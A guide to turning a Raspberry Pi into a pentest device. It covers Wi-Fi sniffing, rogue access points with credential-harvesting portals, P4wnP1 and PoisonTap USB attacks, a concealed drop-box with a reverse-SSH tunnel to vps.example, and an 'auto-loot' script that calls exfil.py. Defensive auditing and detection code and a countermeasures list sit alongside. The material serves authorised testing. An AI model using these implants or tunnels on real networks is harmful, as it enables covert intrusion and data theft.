Quick-Start Overview

A Raspberry Pi can host Kali Linux, capture Wi-Fi traffic, emulate BadUSB devices, or act as a stealth “pentest drop-box.” Success hinges on scoped, permission-based tests and diligent log-keeping. This guide walks you through legal prep, setup, and six hands-on attack simulations you can practice in a home lab.

Ethical hacking is lawful only with explicit consent; South Africa’s Cybercrimes Act treats unauthorised access as a felony. Always draft a written scope, identify data-at-rest boundaries, and agree on a remediation path before testing.

1 · Prepare the Raspberry Pi

1.1 Install Kali Linux ARM

  1. Grab a Class-10 (≥16 GB) micro-SD card.
  2. Use Raspberry Pi Imager → “Other OS → Kali Linux ARM” to flash it.
  3. Enable SSH and Wi-Fi by adding an empty file named ssh and a wpa_supplicant.conf to the boot partition.
  4. Boot, change the default credentials, and update packages: sudo apt update && sudo apt full-upgrade.
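Step 4 is where the Pi gets its first hardening, and the countermeasures section later asks for key-only SSH. A quick way to confirm that this actually took effect is to audit the Pi's sshd_config the way sshd reads it: the first occurrence of a directive wins, keywords are case-insensitive, and anything after a Match line is conditional. The script below is an added example, not code from this guide; the two sample configs are constructed, and the EXPECTED and DEFAULTS tables are assumptions drawn from the OpenSSH defaults.

```python
"""Audit an sshd_config for the hardening the countermeasures section calls for.
Added example (not from the guide); the sample configs below are constructed."""
import re

# Values a hardened Pi should have (assumption: what the guide means by
# "disable SSH password auth", plus the usual companions).
EXPECTED = {
    "passwordauthentication": "no",
    "permitrootlogin": "no",
    "pubkeyauthentication": "yes",
    "challengeresponseauthentication": "no",
}

# What sshd uses when a directive is absent (OpenSSH defaults).
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "pubkeyauthentication": "yes",
    "challengeresponseauthentication": "yes",
}


def parse_global(config_text):
    """Return the effective global directives.

    sshd keeps the FIRST value it sees for a keyword, keywords are
    case-insensitive, '#' starts a comment, and everything after a Match
    line only applies when that Match condition holds, so we stop there."""
    effective = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        effective.setdefault(key, value)
    return effective


def audit(config_text):
    """Return (directive, effective_value, expected_value) for each deviation."""
    effective = parse_global(config_text)
    findings = []
    for key, want in EXPECTED.items():
        have = effective.get(key, DEFAULTS[key]).lower()
        if have != want:
            findings.append((key, have, want))
    return findings


# Constructed sample: looks hardened at a glance but is not. The commented-out
# line leaves the default (yes) in force, and the setting inside the Match
# block only applies to that one user.
WEAK_CONFIG = """\
Port 22
#PasswordAuthentication no
PermitRootLogin no
PubkeyAuthentication yes
Match User tester
    PasswordAuthentication no
"""

HARDENED_CONFIG = """\
PasswordAuthentication no
PermitRootLogin=no
PubkeyAuthentication yes
ChallengeResponseAuthentication no
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg) or "OK")
```

On a live Pi, sudo sshd -T prints the effective configuration after all Match and first-wins rules have been applied; feeding that output to audit() instead of the file removes the guesswork entirely.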

1.2 Attach External Radios

Many attacks need monitor-mode Wi-Fi. Popular adapters include Alfa AWUS036NHA for 2.4 GHz sniffing.

2 · Wireless Reconnaissance

2.1 Passive Packet Capture

  1. Put the adapter in monitor mode: sudo airmon-ng start wlan1.
  2. Capture traffic: sudo airodump-ng wlan1mon --write corp.
  3. Analyse the capture in Wireshark; the eapol display filter isolates the WPA2 four-way handshake frames.

This technique lets you benchmark signal coverage and verify rogue clients without transmitting packets.

2.2 Rogue Access Point Simulation

  1. Install hostapd and dnsmasq.
  2. Configure NAT with iptables-persistent so rules survive reboot.
  3. Set up a captive portal (e.g., wifiphisher) to demonstrate credential harvesting risk.

NOTE — do this only on an isolated lab network or Faraday-shielded room.

3 · BadUSB & HID Injection

3.1 P4wnP1 ALOA (Pi Zero W)

P4wnP1 turns a Pi Zero into a programmable USB HID, ethernet-over-USB, and Wi-Fi C2 bridge. Flash its custom image, edit payload.txt, then plug into a locked workstation to spawn a reverse shell.

3.2 PoisonTap-Style MITM

  1. Clone and run Samy Kamkar’s PoisonTap on a Pi Zero.
  2. Upon USB insertion, the Pi presents as a low-priority NIC and hijacks all HTTP traffic to siphon cookies.

This test demonstrates the value of “USB Restricted Mode” and physical port locks in corporate fleets.
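The detection side of 3.1 and 3.2 is the enumeration pattern the host kernel logs when such a device is plugged in: a composite gadget registers a network interface and a keyboard on the same USB port within seconds, and a PoisonTap-style device registers a network interface on a port where none is expected. The script below is an added example, not code from this guide, P4wnP1 or PoisonTap: it parses constructed dmesg-style lines, groups them by USB port and raises an alert for those two patterns. The log lines, product strings, vendor/product ids and rules are constructed for the demo.

```python
"""Flag BadUSB-style enumeration in kernel USB logs. Added example, not part of
the guide; the log lines below are constructed to mimic dmesg output."""
import re
from collections import defaultdict

# "usb 1-1.3: New USB device found, idVendor=..., idProduct=..."
NEW_DEV = re.compile(
    r"^usb (?P<port>[\d.-]+): New USB device found, "
    r"idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})")
# "<driver> 1-1.3:1.0 usb0: register ..." as cdc_ether, rndis_host etc. print
NET_REG = re.compile(r"^\S+ (?P<port>[\d.-]+):\d+\.\d+ (?P<iface>\w+): register\b")
# "input: <name> as /devices/.../usb1/1-1.3/..."; the sysfs path carries the port
INPUT_REG = re.compile(r"^input: (?P<name>.+?) as (?P<path>/devices/\S+)")
PORT_IN_PATH = re.compile(r"/usb\d+/(?P<port>[\d.-]+)/")


def analyse(log_text):
    """Group enumeration messages per USB port and return (devices, alerts)."""
    devices = defaultdict(lambda: {"id": None, "caps": set()})
    for line in log_text.splitlines():
        if m := NEW_DEV.match(line):
            devices[m["port"]]["id"] = f"{m['vid']}:{m['pid']}"
        elif m := NET_REG.match(line):
            devices[m["port"]]["caps"].add("net")
        elif m := INPUT_REG.match(line):
            if p := PORT_IN_PATH.search(m["path"]):
                kind = "keyboard" if "keyboard" in m["name"].lower() else "input"
                devices[p["port"]]["caps"].add(kind)

    alerts = []
    for port, info in sorted(devices.items()):
        caps = info["caps"]
        if "net" in caps and "keyboard" in caps:
            alerts.append((port, info["id"], "keyboard + network composite: BadUSB/P4wnP1 pattern"))
        elif "net" in caps:
            alerts.append((port, info["id"], "new USB network interface: PoisonTap pattern"))
    return dict(devices), alerts


# Constructed dmesg-style lines: a composite gadget on port 1-1.3 and an
# ordinary mouse on port 1-1.4 (ids and product strings made up for the demo).
KERNEL_LOG = """\
usb 1-1.3: new high-speed USB device number 7 using xhci_hcd
usb 1-1.3: New USB device found, idVendor=1d6b, idProduct=0104, bcdDevice= 4.19
usb 1-1.3: Product: Composite Gadget
cdc_ether 1-1.3:1.0 usb0: register 'cdc_ether' at usb-0000:00:14.0-1.3, CDC Ethernet Device, 02:11:22:33:44:55
input: Composite Gadget Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1.3/1-1.3:1.2/0003:1D6B:0104.0001/input/input21
hid-generic 0003:1D6B:0104.0001: input,hidraw0: USB HID v1.11 Keyboard [Composite Gadget Keyboard] on usb-0000:00:14.0-1.3/input2
usb 1-1.4: new full-speed USB device number 8 using xhci_hcd
usb 1-1.4: New USB device found, idVendor=1234, idProduct=5678, bcdDevice= 1.00
input: Generic USB Mouse as /devices/pci0000:00/0000:00:14.0/usb1/1-1.4/1-1.4:1.0/0003:1234:5678.0002/input/input22
"""

if __name__ == "__main__":
    devices, alerts = analyse(KERNEL_LOG)
    for port, info in devices.items():
        print(port, info["id"], sorted(info["caps"]))
    for alert in alerts:
        print("ALERT", *alert)
```

This is the signal to look for; the enforcement counterparts are the ones the guide lists (USB Restricted Mode, port locks) and, on Linux hosts, a USB authorisation policy that refuses unknown network and HID interfaces by default.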

4 · Stealth Pentest Drop-Box

4.1 Reverse-SSH Tunnel

  1. Auto-connect to your VPS on boot:
    
    autossh -M 0 -N -o "ServerAliveInterval 30" \
    -R 2222:localhost:22 tester@vps.example
    
  2. Hide the Pi behind a printer or VoIP phone; access it via ssh -p2222 tester@vps.example.

Artifice Security’s guide lays out wiring diagrams and OpenVPN hardening.

4.2 Auto-Loot Script Skeleton

#!/bin/bash
# Skeleton only: scan the lab range, record completion, hand the XML to a post-processing script.
LOG=/var/log/loot.log
nmap -sV 10.0.0.0/24 -oX /tmp/map.xml && echo "$(date) map done" >> "$LOG"
python3 exfil.py /tmp/map.xml

5 · Hardware Interface Testing

5.1 UART / JTAG Discovery

Connect Pi GPIO UART to the target’s debug headers; brute-baud with fUART or auto-bauds to locate console pins. Useful for IoT devices lacking signed firmware updates.

5.2 I²C Sensor Spoofing

Use i2c-gpio-custom overlay to emulate malicious sensors that feed tampered readings to industrial controllers—highlighting the need for CRC and authentication on field buses.
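The last clause is the point worth making concrete: a CRC detects bit errors on the bus, but any node that can write to the bus can recompute it, so only a keyed check tells a controller that a reading came from the sensor it trusts. The code below is an added example, not from the guide: a constructed 5-byte sensor frame protected by CRC-8 (polynomial 0x07) and a truncated HMAC-SHA256 tag under a shared key, with a sequence number so a replayed frame is rejected too. The frame layout, key and sample readings are assumptions for the demo.

```python
"""Frame integrity for a field bus: CRC-8 vs. a keyed MAC. Added example, not
from the guide; the frame layout, key and sample readings are constructed."""
import hashlib
import hmac
import struct

SHARED_KEY = b"constructed-demo-key-not-for-real-use"  # per-device key in practice
PAYLOAD_FMT = ">BHh"   # sensor_id (1) | seq (2) | reading (2, signed, e.g. 0.01 degC)
PAYLOAD_LEN = struct.calcsize(PAYLOAD_FMT)   # 5 bytes
TAG_LEN = 8            # truncated HMAC-SHA256 tag


def crc8(data, poly=0x07):
    """CRC-8 with polynomial 0x07 and zero init, a common bus checksum."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = ((crc << 1) ^ poly) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc


def mac_tag(body):
    """Keyed tag over payload+CRC; without SHARED_KEY it cannot be recomputed."""
    return hmac.new(SHARED_KEY, body, hashlib.sha256).digest()[:TAG_LEN]


def build_frame(sensor_id, seq, reading):
    """payload | crc8 | tag"""
    payload = struct.pack(PAYLOAD_FMT, sensor_id, seq, reading)
    body = payload + bytes([crc8(payload)])
    return body + mac_tag(body)


def crc_ok(frame):
    """Legacy check: CRC only. Catches noise, not a node that recomputes the CRC."""
    payload, crc = frame[:PAYLOAD_LEN], frame[PAYLOAD_LEN]
    return crc8(payload) == crc


def verify_frame(frame, last_seq=-1):
    """Return (ok, reason, fields). Order: length, MAC, CRC, then replay check."""
    if len(frame) != PAYLOAD_LEN + 1 + TAG_LEN:
        return False, "bad length", None
    body, tag = frame[:PAYLOAD_LEN + 1], frame[PAYLOAD_LEN + 1:]
    if not hmac.compare_digest(tag, mac_tag(body)):
        return False, "mac mismatch", None
    if not crc_ok(frame):
        return False, "crc mismatch", None
    sensor_id, seq, reading = struct.unpack(PAYLOAD_FMT, body[:PAYLOAD_LEN])
    if seq <= last_seq:
        return False, "replay", None
    return True, "ok", {"sensor_id": sensor_id, "seq": seq, "reading": reading}


def rewrite_reading(frame, new_reading):
    """Model of a node without the key: it can change the reading and recompute
    the CRC, but can only carry over the old tag, which the MAC check catches."""
    sensor_id, seq, _ = struct.unpack(PAYLOAD_FMT, frame[:PAYLOAD_LEN])
    payload = struct.pack(PAYLOAD_FMT, sensor_id, seq, new_reading)
    return payload + bytes([crc8(payload)]) + frame[PAYLOAD_LEN + 1:]


if __name__ == "__main__":
    genuine = build_frame(sensor_id=7, seq=42, reading=2150)   # 21.50 degC
    forged = rewrite_reading(genuine, -4000)
    print("genuine:", verify_frame(genuine))
    print("forged passes CRC-only check:", crc_ok(forged))
    print("forged under MAC check:", verify_frame(forged)[:2])
    print("replayed genuine frame:", verify_frame(genuine, last_seq=42)[:2])
```

The MAC is checked before the CRC and before any field is parsed, so a tampered frame is rejected without the controller ever acting on its contents; the CRC stays in the frame because legacy receivers and the bus driver still rely on it.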

6 · Defensive Countermeasures

  1. Patch and monitor Raspberry Pi: enable ufw, disable SSH password auth, install fail2ban.
  2. Use 802.1X or MACsec to block rogue wired devices on corporate switches.
  3. Deploy WIDS sensors (Kismet supports Pi) to flag new SSIDs or de-auth floods.
  4. Set mobile-device “USB Restricted Mode” and lock BIOS to thwart BadUSB attacks.

Reference Index

  • Kali Linux on Pi 4 docs
  • Sunfounder Kali Linux Pi guide
  • Wi-Fi Sniffer tutorial
  • Rogue AP setup notes
  • P4wnP1 repository
  • PoisonTap BadUSB-ETH article
  • Pentest Drop-Box build
  • SA Cybercrimes Act analysis
  • Hacking tool roundup 2025
  • Pi hardware hacking discussions